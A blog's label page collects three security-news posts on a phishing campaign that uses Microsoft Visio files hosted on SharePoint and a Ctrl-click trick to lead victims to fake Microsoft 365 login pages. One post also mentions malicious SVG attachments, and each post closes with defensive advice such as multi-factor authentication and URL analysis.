Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Microsoft visio. Show all posts
SharePoint
Credential Theft Cyber Fraud Cyber Threats Microsoft 365 login Microsoft visio Phishing Attack Phishing Campaigns SharePoint

New Two-Step Phishing Attack Exploits Microsoft Visio and SharePoint

 

A novel two-step phishing strategy is targeting Microsoft Visio files (.vsdx) and SharePoint, signaling a new trend in cyber deception, according to experts. Researchers at Perception Point have noted a significant rise in attacks leveraging these previously uncommon .vsdx files.

These files act as delivery tools, directing victims to phishing pages that replicate Microsoft 365 login portals, aiming to steal user credentials.

The two-step phishing attacks employ layered techniques to evade detection. Rather than delivering harmful content directly, these campaigns use trusted platforms like Microsoft SharePoint to host files that appear legitimate. Attackers embed URLs within Visio files, which redirect victims to malicious websites when clicked, bypassing traditional email security systems.

Microsoft Visio, a popular tool for professional diagram creation, has now become a phishing vector. Cybercriminals send emails with Visio files from compromised accounts, often mimicking urgent business communications such as proposals or purchase orders. This tactic encourages recipients to act quickly, increasing the likelihood of success.

Since the emails come from stolen accounts, they often pass authentication checks and evade recipient security filters. In some cases, attackers include .eml files within the emails, embedding additional malicious URLs linked to SharePoint-hosted files.

The Visio files typically contain a clickable button labeled "View Document." Victims are instructed to press the Ctrl key while clicking the button to access the malicious URL. This step, requiring manual interaction, bypasses automated security systems that cannot simulate such behaviors.

Perception Point advises organizations to strengthen their defenses against sophisticated phishing campaigns by adopting advanced threat detection solutions. Suggested measures include:

  • Dynamic URL analysis to identify harmful links.
  • Object detection models to flag suspicious files.
  • Enhanced authentication mechanisms to reduce the impact of compromised accounts.
Read more »
SVG attachments
cyber fraud prevention Cyber Security Cybersecurity email security Microsoft visio Phishing Attacks Ransomware threats SVG attachments

Cybercriminals Exploit Two-Step Phishing Tactics and SVG Attachments in Sophisticated Cyber Attacks

 

Layered defense strategies are a cornerstone of cybersecurity, but attackers are employing similar methods to launch sophisticated attacks. Two-step phishing (2SP) tactics are becoming increasingly prevalent, leveraging trusted platforms to deliver malicious content in layers and evade detection, according to researchers at Perception Point.

These researchers have identified a new wave of 2SP attacks weaponising Microsoft Visio (.vsdx) files. Peleg Cabra, product marketing manager at Perception Point, shared that Ariel Davidpur, a security researcher at the firm, uncovered an alarming trend: attackers are embedding malicious URLs within Visio files to bypass security systems.

Visio, widely used in workplaces for data visualization, plays into the attackers' strategy of exploiting familiarity. The files are being used in phishing emails containing urgent business-related requests. Once the recipient engages with these emails and accesses the Visio file, they encounter another embedded URL disguised as a clickable button, like “view document.”

Perception Point’s analysis highlights how attackers ask victims to hold the Ctrl key while clicking the URL, bypassing automated detection tools. This redirects users to a fake Microsoft 365 login page designed to steal credentials. Robust two-factor authentication is recommended to mitigate the risks of such attacks.

Additionally, a report by Lawrence Abrams from Bleeping Computer reveals another alarming technique: attackers are leveraging scalable vector graphics (SVG) files. These files, capable of displaying HTML and executing JavaScript, are being used to deliver phishing forms and malware. Security researcher MalwareHunterTeam demonstrated how SVG attachments could mimic an Excel spreadsheet with an embedded login form to harvest credentials.

To counter these threats, cybersecurity experts recommend treating SVG attachments with suspicion and implementing stringent email security measures.

International Fraud Awareness Week, held from November 17 to 23, 2024, aims to raise awareness of evolving cyber fraud. Muhammad Yahya Patel, lead security engineer at Check Point Software, warns that technological advancements empower both legitimate industries and cyber criminals.

Patel categorizes the major fraud types businesses should watch out for:
  • Cyber Fraud: Using phishing, malware, and ransomware to steal sensitive data.
  • Internal Fraud: Involving employee-driven actions like embezzlement and theft.
  • Invoice Fraud: Sending fake invoices to businesses for payment.
  • CEO Fraud: Impersonating executives to extract sensitive information.
  • Return Fraud: Exploiting return policies in retail for financial gain.
  • Payroll Fraud: Manipulating payroll systems to benefit employees fraudulently.
Ransomware has also evolved from untargeted attacks to highly strategic campaigns, employing reconnaissance and double-extortion tactics. As cyber threats grow more sophisticated, businesses must remain vigilant, adopt robust security practices, and foster awareness to combat evolving fraud.
Read more »
phishing
Data Breach Microsoft visio Perception Point phishing

Phishing Scams use Microsoft Visio Files to Steal Information

 


The latest phishing attacks involve users being victimised in private information scams through the use of Microsoft Visio files. According to a security firm called Perception Point, the trick mainly involves using the .vsdx file extension, used for business diagrams and flowcharts. It has been found that cyber attackers can embed malicious links in Visio files to circumvent most of the traditional checks a secured system carries out on users.


Why Visio files are a hacker's best friend

In particular, Microsoft Visio files are less often encountered by users due to being not as well known as other attachment types, for instance, PDFs or Word documents. This means that the files of the type Visio would be less likely to be considered suspicious by a security system, making them a good target for hackers who send phishing links secretly. All of this aside, Visio files themselves are transmitted via email attachments, which most users trust because they are all Microsoft tools.


How the Visio Phishing Attack Work


This is how the particular phishing scheme unfolds, according to Perception Point:

1. Accessed Accounts: Scammers first gain access to a legitimate account so they can use it to send their phishing email. This gives them a head over basic security checks since it is coming from a trusted source.

2. Email Content : It has an attachment which is a Visio file (.vsdx) or an Outlook email (.eml), and from what it looks like, it's authentic: probably a proposal or order for some kind of purchase.

3. Opening the File: As soon as the recipient clicks on the attachment to open it, they are taken to a SharePoint page, serving the Visio file. Thieves brand some of the hacked organisation's logos to give the document the look of authenticity.

4. Link in Visio document: Attackers will go and add a link within the Visio document titled "View Document." Users are encouraged to click with the Ctrl key in order to click on the link. It is thought that this behaviour should bypass many forms of automated security scanning. Once they have clicked on it, the victims are taken to a mock Microsoft log-in page that forces them to input their passwords, which are then stolen.


Phishing by Trusted Platforms

As Perception Point reports, phishing attacks using trusted Microsoft tools-SharePoint and Visio-have been rising alarmingly. Using credible tools creates layers of trust, which diminishes the chances of detection for phishers. Thus, Microsoft has warned users to look out for the potential abuse of its tool in phishing scams.

According to Perception Point, this phishing method utilises trusted tools from Microsoft, such as Visio and SharePoint-meaning cybercrooks adapt to evade detection. As per the same sources, these methods are designed to gain user trust and evade traditional systems in email security.

 Recommended Security Best Practices

The best practices to mitigate such advanced phishing are as follows for both organizations and individual users:
There is verification of the sender's identity before opening attachments from unknown or unfamiliar contacts.

Enable multi-factor authentication: In addition to the extra security multi-factor authentication has in place, it will be much harder for hackers to access your accounts without any kind of authentication

Stay updated on phishing techniques: Educate the employees to become aware of recognizing and avoiding attempts from hackers.

Advanced Email Security Tools: Implement tools that are now specifically designed to monitor unusual file types, including Visio files, with the aim of detecting emerging phishing strategies.

In this day and age of phishing scams, staying abreast and refreshing security protocol can definitely go a long way.



Read more »
Subscribe to: Posts (Atom)